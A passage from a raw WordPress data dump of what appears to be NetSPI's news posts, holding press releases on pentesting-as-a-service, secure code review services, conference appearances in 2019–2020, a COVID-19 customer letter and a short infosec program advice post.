[post_name] => netspi-adds-to-leadership-team-to-support-continued-focus-on-customer-success
[post_modified] => 2021-04-14 06:52:43
[post_modified_gmt] => 2021-04-14 06:52:43
[guid] => https://www.netspi.com/?post_type=news&p=19939
)
[75] => WP_Post Object
(
[ID] => 19512
[post_author] => 91
[post_date] => 2020-08-03 07:00:59
[post_date_gmt] => 2020-08-03 07:00:59
[post_content] =>
During the Black Hat 2020 Virtual Conference, NetSPI, a leader in enterprise security testing and vulnerability management, will provide a fresh perspective on optimizing pentesting and application security (AppSec) programs. Today, there are more software-based solutions than ever before. From rising dependency on smartphone applications to the growing remote workforce increasing the usage of cloud-based software, reliance on software continues to grow. This means more AppSec security tools and automation have become available – and, in-turn, an overwhelming number of AppSec methodologies and approaches to follow. To navigate the complex security considerations, NetSPI is working to change the way organizations think about AppSec by embracing security throughout the development lifecycle.
Who:
Deke George, CEO, NetSPI
Aaron Shilts, President and COO, NetSPI
Nabil Hannan, Managing Director, NetSPI
Jake Reynolds, Product Manager, NetSPI
What:
On Wednesday, August 5, at 11:20–11:40am PT, NetSPI Managing Director Nabil Hannan and Product Manager Jake Reynolds will host a session titled, Extreme Makeover: AppSec Edition. During the session, attendees will learn how leading organizations use different discovery techniques as part of their AppSec program, understand the strengths and weaknesses of common AppSec vulnerability discovery technologies, and adopt techniques that make security frictionless for their developers as they embrace a DevSecOps culture. Additionally, they will discover how functional their application security program can be with a “makeover” to:
Enhance reporting to empower leadership to optimize AppSec programs
Improve vulnerability ingestion, correlation, and enrichment
Increase speed to remediation
The NetSPI team will have a virtual exhibitor booth in the Black Hat Business Hall. Schedule a briefing to hear the latest company updates and explore NetSPI’s new products and services, including:
Strategic Advisory Services: In June 2020, NetSPI revealed a new application-centric approach to its Strategic Advisory Services to help organizations gain a competitive edge through a formalized, business-objective driven, and mature application security program.
Pentesting as a Service (PTaaS): Launched in 2020, NetSPI’s PTaaS delivery model puts customers in control of their pentests and their data, enabling them to simplify the scoping of new engagements, view their testing results in real time, orchestrate quicker remediation, and add the ability to perform always-on continuous testing.
When:
Virtual Session: Wednesday, August 5, 11:20–11:40am PST
Black Hat 2020 Virtual Conference: August 1-6, 2020
Where:
Attend the virtual session, Extreme Makeover: AppSec Edition, online here.
Stop by NetSPI’s virtual booth by searching for NetSPI in the Black Hat event portal.
Media:
Virtual briefings with the NetSPI team available upon request. To attend the virtual session on August 5, register for a free Black Hat Business Pass.
Contact:
Tori Norris
Maccabee Public Relations on behalf of NetSPI
tori@maccabee.com, (612) 294-3100
[post_title] => NetSPI to Help Black Hat USA 2020 Attendees View Penetration Testing and Application Security Through a New Lens
[post_excerpt] => During the Black Hat 2020 Virtual Conference, NetSPI will provide a fresh perspective on optimizing pentesting and application security (AppSec) programs.
[post_name] => netspi-help-black-hat-usa-2020-attendees-view-penetration-testing-application-security-through-new-lens
[post_modified] => 2021-04-14 06:52:48
[post_modified_gmt] => 2021-04-14 06:52:48
[guid] => https://www.netspi.com/?post_type=news&p=19512
)
[76] => WP_Post Object
(
[ID] => 19437
[post_author] => 91
[post_date] => 2020-07-28 07:00:25
[post_date_gmt] => 2020-07-28 07:00:25
[post_content] =>
The new services are designed to identify application security vulnerabilities earlier in the software development life cycle.
Minneapolis, Minnesota – To mitigate possible security vulnerabilities early in the fast-paced software development life cycle process, today NetSPI, the leader in enterprise security testing and vulnerability management, launched Static Application Security Testing (SAST) and Secure Code Review (SCR) services to aid application and software development teams in establishing a more strategic approach to building secure applications. Key to NetSPI’s multi-level secure code review services involving SAST and SCR is a thorough inspection of source and compiled code to ensure security risks are eliminated before software is deployed to production, at which time the cost of remediation could increase exponentially.
“With Continuous Integration/Continuous Deployment more and more becoming the backbone of the modern DevOps environment, it’s more important than ever to detect and address vulnerabilities through Static Application Security Testing and Source Code Review processes, a service that is complementary to an organization’s penetration testing efforts,” said Nabil Hannan, managing director at NetSPI. “Both testing functions enable more comprehensive vulnerability detection and, in many cases, identify vulnerabilities that are not possible to discover during dynamic testing and analysis.”
NetSPI’s SAST and SCR services are offered in various engagement structures giving application and software development teams options to leverage the appropriate level of testing depth to detect, validate, and resolve security issues based on the business criticality and risk profile of their applications. The services are also a solution to adhere to application development compliance standards, including PCI DSS and HIPAA. NetSPI’s SAST and SCR offerings include:
Static Application Security Testing (SAST)—A static analysis performed with a combination of commercial, open source, and proprietary SAST tools, resulting in an assessment report from NetSPI that describes found vulnerabilities and actionable remediation guidance. Additionally, NetSPI offers a streamlined, more economical SAST service which focuses only on testing around the Open Web Application Security Project® (OWASP) Top 10 vulnerabilities.
Static Application Security Testing (SAST): Triaging—As an augmentation to an organization’s internal use of SAST tools in Application Security Programs, NetSPI offers triage services. By analyzing the data and assigning degrees of urgency on behalf of the security teams, NetSPI can validate the exploitability of vulnerabilities to remove any false positive findings, allowing development teams the time to focus exclusively on remediation.
Secure Code Review (SCR)—Building off the SAST offerings, NetSPI’s SCR offering employs cyber security experts to review the underlying frameworks and libraries that are being leveraged to build the application. From there, manual testers identify vulnerabilities that automated scanners cannot detect, such as complex injection attacks, insecure error handling, and authentication and authorization issues. Additionally, NetSPI offers a streamlined, more economical SCR service which focuses only on reporting around the Open Web Application Security Project® (OWASP) Top 10 vulnerabilities.
Unique to NetSPI is its instructor-led training program around secure coding and remediation for development teams, made available to clients after completion of Static Application Security Testing (SAST) or Secure Code Review (SCR) engagements. Available for up to a class size of 20, NetSPI’s one-day training details the top five categories of vulnerabilities identified in the SAST or SCR engagement and provides insights specific to that organization as well as remediation or mitigation techniques.
“We’ve seen a movement to the left, in terms of prioritizing SCR earlier in the SDLC process as Application Security Programs have evolved,” said Hannan. “We support this strategic approach to security as it is critical to identify and remediate vulnerabilities, and in some cases even prevent them, during the software development phase.”
Learn more about Secure Code Review (SCR) and Static Application Security Testing (SAST) from NetSPI online at netspi.com/security-testing/secure-code-review/ or email heather.rubash@netspi.com to schedule an introductory call with Nabil Hannan, Managing Director at NetSPI.
About NetSPI
NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.
Contact:
Tori Norris
tori@maccabee.com
612-294-3100
[post_title] => NetSPI Brings Scale, Agility, and Speed to Static Application Security Testing and Secure Code Review
[post_excerpt] => On July 28, 2020, we launched Static Application Security Testing (SAST) and Secure Code Review (SCR) services to aid application and software development teams in establishing a more strategic approach to building secure applications.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-brings-scale-agility-speed-static-application-security-testing-secure-code-review
[to_ping] =>
[pinged] =>
[post_modified] => 2021-04-14 06:52:53
[post_modified_gmt] => 2021-04-14 06:52:53
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?post_type=news&p=19437
[menu_order] => 358
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[77] => WP_Post Object
(
[ID] => 19238
[post_author] => 91
[post_date] => 2020-06-30 07:00:16
[post_date_gmt] => 2020-06-30 07:00:16
[post_content] =>
The new offering will help CISOs and software developers/engineers navigate application security to promote cyber security program maturity.
Minneapolis, Minnesota – Today, NetSPI, the leader in enterprise security testing and vulnerability management, revealed a new application-centric approach to its Strategic Advisory Services to help organizations gain a competitive edge through a formalized, well-balanced, business-objective driven, and mature application security program. While advisory services are not new to NetSPI, the company saw an opportunity to use its breadth of knowledge in security testing to help define and guide organizations to implement application security into broader threat and vulnerability management programs.
Through NetSPI’s Strategic Advisory Services, the company will share tangible and data-driven guidance on building or improving application security strategies and other software security initiatives. The three core functions and benefits of the new offering include:
Program Benchmarking: Using real-world data, NetSPI’s program benchmarking services enable IT and security teams to evaluate program maturity against empirical data from the industry, measure and track the progress of security efforts objectively over time, compare security efforts with peers in the same business vertical, and ultimately help organizations adapt to current security best practices. Each benchmarking report will yield an evaluation of the current state of a company’s Application Security Program with details around focus areas for improvement along with areas that are currently addressing the organization’s Application Security needs effectively.
Roadmap Development: Commonly performed alongside benchmarking, NetSPI’s roadmapping services define the future state of application security programs and the strategic path forward. The program roadmap will guide security stakeholders to determine the best approach to optimize application security investments by identifying unique organizational needs, leveraging established frameworks, and performing penetration tests to allow for early discovery of the types of vulnerabilities that exist while determining realistic goals and defining an appropriate timeline around key milestones.
Security Metrics Development: Metrics, unlike raw data or measurements, can help answer specific business questions and help teams track progress. They are a critical component for measuring ROI of security programs, but organizations often lack the proper metrics to evaluate how application security efforts are influencing and helping achieve its business objectives. With NetSPI’s security metrics services, organizations will work with a consultant to define metrics that can be automated by leveraging existing business processes and raw data to provide necessary context to make effective business decisions.
“Given how fast application development techniques and methodologies are transforming, companies need to ensure that their security practices are staying current with the ever-evolving pressures around compliance and governance, software deployment, DevOps, Software Development Lifecycle (SDLC), and training,” said Nabil Hannan, managing director at NetSPI. “Understanding the current level of maturity and developing a data-driven plan to evolve your application security program is key to the success of your organization’s security efforts.”
Learn more about Strategic Advisory Services from NetSPI online at Strategic Advisory or email heather.rubash@netspi.com to schedule an introductory call with Nabil Hannan, Managing Director at NetSPI.
About NetSPI
NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track, and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => NetSPI Reimagines Strategic Advisory Services, With a Focus on Application Security
[post_excerpt] => On June 30, 2020, we revealed a new application-centric approach to our Strategic Advisory Services to help organizations gain a competitive edge through a formalized, well-balanced, business-objective driven, and mature application security program.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-reimagines-strategic-advisory-services-focus-application-security
[to_ping] =>
[pinged] =>
[post_modified] => 2021-04-14 06:52:58
[post_modified_gmt] => 2021-04-14 06:52:58
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?post_type=news&p=19238
[menu_order] => 364
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[78] => WP_Post Object
(
[ID] => 17790
[post_author] => 91
[post_date] => 2020-03-17 07:00:33
[post_date_gmt] => 2020-03-17 07:00:33
[post_content] =>
On March 17, 2020, we shared the below communication with our customers in regards to COVID-19, and wanted to make it available to the broader community.
Minneapolis, Minnesota – During these unprecedented times, our team wanted to reach out, first and foremost, to wish you continued health and safety. In addition, we wanted to share how we are responding to the evolving COVID-19 situation through ongoing business continuity planning and our flexible approach to move forward with your penetration testing while also protecting your critical infrastructure.
NetSPI's Business Continuity Planning
We run business continuity planning exercises regularly, and recently performed a special exercise to simulate additional work-from-home load. All systems performed well in this test and validated our resiliency in a situation where all physical NetSPI offices are closed. In addition, our Resolve™ platform is crucial to our resiliency in that it allows our team of testers and project managers to communicate seamlessly with your team ensuring you can prioritize and fix your vulnerabilities faster.
Flexibility to Protect Your Critical Infrastructure
NetSPI is extremely flexible and our testing is built to ensure we do not impact your critical infrastructure. As such, we can:
Perform off-hours testing.
Modify the configuration of our tools (tweak our systems to go lower and slower than normal).
Conduct testing in QA and dev environments for pre-production application testing.
Employee Health and Travel
The health and safety of our employees is our primary concern. We are following CDC, state, and local guidelines for our staff and office closures. As a global organization, we have always supported a strong virtual infrastructure for team collaboration.
At this time, most of our client interaction is taking place over email, phone, and video conference. We continue to focus on exceeding expectations, maintaining connectivity, and ensuring continued contact with all clients to answer questions and manage your testing needs.
NetSPI is a strong, healthy business and team. Our clients can be confident leveraging our testing expertise which will continue without interruption. You are the backbone of our business and we thank you for your continued partnership and confidence.
If you have specific questions about a project, please reach out to your sales or PMO contact. If you would like to speak directly to someone on our Executive Team, please feel free to contact me directly.
We appreciate your business and look forward to continuing to serve you.
Aaron Shilts
President & COO
Aaron.Shilts@NetSPI.com
C: 612-326-4018
[post_title] => NetSPI Response to COVID-19
[post_excerpt] => On March 17, 2020, we shared the below communication with our customers in regards to COVID-19, and wanted to make it available to the broader community.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-response-to-covid-19
[to_ping] =>
[pinged] =>
[post_modified] => 2021-04-14 06:53:04
[post_modified_gmt] => 2021-04-14 06:53:04
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?post_type=news&p=17790
[menu_order] => 405
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[79] => WP_Post Object
(
[ID] => 16655
[post_author] => 91
[post_date] => 2020-02-17 07:00:15
[post_date_gmt] => 2020-02-17 07:00:15
[post_content] =>
PTaaS will be demoed at RSAC 2020, showcasing how the delivery model enables organizations to keep pace with today’s cybersecurity landscape.
Minneapolis, Minnesota – NetSPI, the leader in enterprise security testing and vulnerability management, today debuted its new delivery model, Penetration Testing as a Service (PTaaS) powered by the Resolve™ platform. PTaaS puts customers in control of their pentests and their data, enabling them to simplify the scoping of new engagements, view their testing results in real time, orchestrate quicker remediation, and add the ability to perform always-on continuous testing.
Taking note of customer needs and emerging attack surfaces, NetSPI has leveraged its knowledge in traditional, point-in-time pentests to develop a scalable, always-on model for enterprise security testing. NetSPI PTaaS delivers program level security testing comprised of an expert manual pentesting team enhanced by automation.
“During our 20 years of penetration testing, our clients have consistently asked for guidance to understand, report on, and remediate their security vulnerabilities. While we’ve been excited to provide this assistance, we also knew there was more we could do to meet all our clients’ needs, which led to the creation of PTaaS,” said NetSPI President and Chief Operating Officer, Aaron Shilts. “As a leader in the cybersecurity industry, our experts have always found vulnerabilities that others miss, but PTaaS allows us to go a step further – delivering clear, actionable recommendations to our customers, enabling them to find and fix their vulnerabilities faster.”
According to Gartner, “although separate from VA, penetration testing plays an important role in the prioritization and assessment of vulnerabilities from Gartner’s RBVM (risk-based vulnerability management) methodology. These services are testing your environment, with real-world skills and knowledge of the prevailing threat landscape. Security leaders need to take these recommendations and apply it directly in your security programs to address their prioritized findings.”*
NetSPI believes PTaaS powered by Resolve™ solves critical cybersecurity challenges, by enabling:
Real-time accessible reporting: Gone are the days of managing multiple static PDF reports with out-of-date vulnerability information. With PTaaS powered by Resolve™, organizations can access their data in real-time as vulnerabilities are found by the NetSPI team of experts, and easily generate custom reports as desired.
Increased speed to remediation: PTaaS powered by Resolve™ helps organizations fix their vulnerabilities faster than traditional pentesting. Resolve™, a SaaS platform, will house all vulnerability data and provide remediation guidance for real-time access and assessment. In addition, customers can communicate with NetSPI security experts via the platform for additional clarity, to request remediation testing, or to scope a new engagement.
Continued manual testing: NetSPI’s team of highly skilled employees will continue its award-winning service of deep-dive manual penetration testing as automated pentesting and scanners will only ever find a portion of an organization’s vulnerabilities. While automation creates efficiencies, the human touch is also necessary to identify potentially high and critical severity threats that can only be discovered by manual testing.
More testing: Organizations with a mature security program understand that point-in-time testing is not a viable model to continuously secure their applications and networks. New code and configurations are released every day, and PTaaS powered by the Resolve™ platform’s continuous security program delivers results to customers around the clock, enabling them to manage their vulnerabilities more easily and efficiently.
Learn more about NetSPI PTaaS powered by Resolve™ here, or set up a 1:1 meeting at RSAC (February 24-28) online here.
*Gartner “Market Guide for Vulnerability Assessment,” Craig Lawson, et al, 20 November 2019
About NetSPI
NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.
Media Contact
Tori Norris
Maccabee Public Relations
Email: tori@maccabee.com
Phone: (612) 294-3100
[post_title] => NetSPI Introduces Penetration Testing as a Service (PTaaS) Powered by Resolve™
[post_excerpt] => PTaaS will be demoed at RSAC 2020, showcasing how the delivery model enables organizations to keep pace with today’s cybersecurity landscape.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-introduces-penetration-testing-as-a-service-ptaas-powered-by-resolve
[to_ping] =>
[pinged] =>
[post_modified] => 2021-04-14 06:54:00
[post_modified_gmt] => 2021-04-14 06:54:00
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?post_type=news&p=16655
[menu_order] => 413
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[80] => WP_Post Object
(
[ID] => 16308
[post_author] => 91
[post_date] => 2020-02-04 07:00:34
[post_date_gmt] => 2020-02-04 07:00:34
[post_content] =>
NetSPI Heads to RSAC 2020 to Showcase and Demo Penetration Testing as a Service (PTaaS) Powered by Resolve™
Minneapolis, Minnesota – NetSPI, a leader in vulnerability testing and management, is exhibiting at RSAC 2020 at the Moscone Center in San Francisco. On February 24-28, the halls will be filled with cybersecurity industry conversations, including expert-led sessions and keynotes, innovation programs, in-depth tutorials and trainings, expanded networking opportunities, product demos, and more. This year, the conference theme is “Human Element,” exploring our critical role in ensuring a safer, more secure future. During the conference, the NetSPI leadership team will be showcasing its new Penetration Testing as a Service (PTaaS) delivery service model powered by Resolve™.
Who:
Deke George, Founder and CEO at NetSPI
Aaron Shilts, President and COO at NetSPI
Charles Horton, SVP Client Services at NetSPI
Jake Reynolds, Product Manager at NetSPI
What:
RSAC Exhibitor Booth – Meet the NetSPI team at booth #4201 to learn more about their expertise in penetration testing and vulnerability management. Get a first look and demo of PTaaS Powered by Resolve™.
“Scaling Your Security Program with Penetration Testing as a Service” – Whether managing an annual penetration test, or delivering and prioritizing millions of vulnerabilities, traditional service delivery methods fall short. Visit booth S-1500 in the RSAC Briefing Center on Thursday, February 28 at 4:40pm PST to hear NetSPI Product Manager Jake Reynolds speak about how Penetration Testing as a Service scales and operationalizes continuous penetration testing in an ongoing, consumable fashion.
View the full conference agenda here.
When:
February 24-29, 2020
Where:
Booth #4201
Moscone Center
San Francisco, California
About NetSPI
NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top ten U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.
Media Contact
Tori Norris
Maccabee on behalf of NetSPI
Email: tori@maccabee.com
Phone: (612) 294-3100
[post_title] => NetSPI Heads to RSAC 2020 to Showcase and Demo Penetration Testing as a Service (PTaaS) Powered by Resolve™
[post_excerpt] => NetSPI, a leader in vulnerability testing and management, is exhibiting at RSAC 2020 at the Moscone Center in San Francisco.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-heads-to-rsac-2020-to-showcase-and-demo-pen-testing-as-a-service-ptaas-powered-by-resolve
[to_ping] =>
[pinged] =>
[post_modified] => 2021-04-14 07:13:25
[post_modified_gmt] => 2021-04-14 07:13:25
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?post_type=news&p=16308
[menu_order] => 416
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[81] => WP_Post Object
(
[ID] => 16211
[post_author] => 91
[post_date] => 2020-01-21 07:00:32
[post_date_gmt] => 2020-01-21 07:00:32
[post_content] =>
Hannan brings 13 years’ cyber security experience to help NetSPI clients overcome vulnerability management challenges.
Minneapolis, Minnesota – NetSPI, a leader in enterprise security testing and vulnerability management, has added Nabil Hannan as Managing Director, where he will work with NetSPI clients on strategic security solutions incorporating both technology and services.
“NetSPI’s innovative technology and services are essential for any high performing security program,” said Aaron Shilts, NetSPI President and COO. “Strategically, we continue to strive to be at the leading edge of this industry, providing valuable, actionable guidance to our clients, and Nabil adds to our ability to do this. He will consult directly with our clients and advise them on how to solve their most critical cyber security challenges in 2020 and beyond.”
Hannan comes to NetSPI with a deep background in building and improving effective software security initiatives, with expertise in the financial services sector. Most notably, in his 13 years of experience in cyber security consulting, he held a position at Cigital/Synopsys Software Integrity Group, where he identified, scoped, and delivered on software security projects, including architectural risk analysis, penetration testing, secure code review, malicious code detection, vulnerability remediation, and mobile security assessments. Hannan has also worked as a Product Manager at Research In Motion/BlackBerry and has managed several flagship initiatives and projects through the full software development life cycle.
“Cyber security is more critical today than ever before. We’ve all seen news of breaches in the headlines and may have even been affected by these breaches personally,” said Nabil Hannan, NetSPI Managing Director. “I look forward to advising NetSPI’s prestigious client base and helping companies protect their organizations, strategic assets, and valuable intellectual property. My role will also support NetSPI’s vision to help organizations build and maintain strong threat and vulnerability management programs – leveraging both technology and human capital.”
Learn more about NetSPI’s Advisory Services at https://netspi.com/services/strategic-advisory/ or connect with Nabil on Twitter or LinkedIn.
About NetSPI
NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.
Media Contact
Tori Norris
Maccabee Public Relations
Email: tori@maccabee.com
Phone: (612) 294-3100
[post_title] => NetSPI Adds Seasoned Security Expert Nabil Hannan to Its Team
[post_excerpt] => Hannan brings 13 years’ cyber security experience to help NetSPI clients overcome vulnerability management challenges.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-adds-seasoned-security-expert-nabil-hannan-to-its-team
[to_ping] =>
[pinged] =>
[post_modified] => 2021-04-14 07:11:03
[post_modified_gmt] => 2021-04-14 07:11:03
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?post_type=news&p=16211
[menu_order] => 418
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[82] => WP_Post Object
(
[ID] => 15848
[post_author] => 91
[post_date] => 2020-01-14 07:00:02
[post_date_gmt] => 2020-01-14 07:00:02
[post_content] =>
Over the past 20 years of working with companies of all sizes and ages, NetSPI has seen some of the best and worst infosec programs. No matter what stage you’re in with developing your program, keep these three best practices in mind today to set your team and company up for success tomorrow.
Scalability First
Build scalability into every strategy and program. Ask yourself “Will this scale?” at every step. It’s very easy to paint yourself into a corner by focusing on a tactical solution when a security alert or emergency occurs, so take a minute to stop and think whether your solution is going to scale if it is implemented company-wide. If your “solution” is not scalable, you may end up with two or three times the work and expense later, so try to quantify the lifetime impact of your decision upfront.
Another scalability-related tip is to plan to be successful from the outset. Choose scalable tools and processes, supported by flexible staffing, to help manage growth efficiently.
Be Flexible
Find a balance between repeatability and consistency on one side and flexibility and agile ingenuity on the other. Some processes need to be rigid and consistent, while some can be more freeform. In the past, we’ve tried to engineer a process to enforce a set of constraints only to learn that it did not really matter or mitigate risk. In the security community we tend to look for ways to make processes repeatable and remove their dynamics, but by doing so, we sometimes lose the intended purpose of the activity. It’s more art than science, but finding a balance between flexibility and rigidity is important.
Plan for Communication and Collaboration
Many problems can be traced back to miscommunication and misunderstanding of what is usually a technical topic by people who do not have technical expertise. As such, planning for communication and collaboration in the early stages of building out your program is critical.
Keep in mind that people interpret words differently. Scan, assessment, risk, and vulnerability mean different things to different people, and this has resulted in miscommunication and differing expectations. Take a step back to clearly define those terms and ensure everyone is on the same page.
[post_title] => Three Things To Remember When Building Your InfoSec Program
[post_excerpt] => Over the past 20 years of working with companies of all sizes and ages, NetSPI has seen some of the best and worst infosec programs.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => three-things-to-remember-when-building-your-infosec-program
[to_ping] =>
[pinged] =>
[post_modified] => 2023-02-13 13:39:28
[post_modified_gmt] => 2023-02-13 19:39:28
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=15848
[menu_order] => 419
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[83] => WP_Post Object
(
[ID] => 13214
[post_author] => 91
[post_date] => 2019-07-31 07:00:03
[post_date_gmt] => 2019-07-31 07:00:03
[post_content] => Minneapolis, Minnesota – NetSPI LLC, the leader in orchestrated vulnerability management and security testing, announced today its participation at Black Hat USA 2019, Aug. 7-8 (booth #105) in Las Vegas, NV. NetSPI will present and exhibit at the conference to showcase vulnerability management and penetration testing solutions that improve an organization’s information security posture. NetSPI’s security experts will provide best practices and insights during their presentations and will also be available to meet 1:1. Schedule a session now.
Presentations at NetSPI Booth #105
Attacking Modern Environments through SQL Server with PowerUpSQL
When: Wednesday, August 7 at 10:30 a.m., 1:00 p.m., and 4:30 p.m.; Thursday, August 8 at 11:00 a.m.
Where: NetSPI Booth #105
Presenter: Scott Sutherland